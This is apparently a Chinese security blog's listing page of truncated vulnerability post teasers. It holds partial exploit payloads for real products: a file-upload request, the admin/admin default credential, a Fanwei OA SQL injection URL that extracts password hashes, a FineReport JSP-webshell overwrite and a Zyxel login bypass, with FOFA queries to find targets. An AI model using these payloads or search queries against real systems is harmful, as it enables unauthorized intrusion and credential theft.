描述
存在某接口可被攻击者利用上传文件
利用
上传
POST /Upload/upload_file.php?l=test HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10...
Adminxe
4年前 (2021-04-17) 2161℃ 0评论
6喜欢
描述
系统存在弱口令和任意文件下载漏洞
fofa “深圳银澎云计算有限公司”
POC & EXP
# 弱口令
admin/admin
任意文件下载
/register/toDownload.do?fileName=敏感...
Adminxe
4年前 (2021-04-17) 5170℃ 0评论
8喜欢
1、泛微OA V8 SQL注入
描述
可以通过漏洞获取到系统管理员加密的(MD5)的密码值
利用(payload)
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%...
Adminxe
4年前 (2021-04-17) 4505℃ 0评论
6喜欢
描述
此漏洞是任意文件覆盖,上传JSP马,需要找已存在的 jsp 文件进行覆盖Tomcat 启动帆软后默认存在的JSP文件
影响版本
FineReportV9
漏洞详情
版本:/tomcat-7.0.96/webapps/ROOT/inde...
Adminxe
4年前 (2021-04-17) 5474℃ 0评论
8喜欢
描述
Zyxel NBG2105 存在身份验证绕过,攻击者通过更改 login参数可用实现后台登陆
影响版本:Zyxel NBG2105
fofa app=”ZyXEL-NBG2105″
POC & EXP
# pyth...
Adminxe
4年前 (2021-04-17) 1957℃ 0评论
7喜欢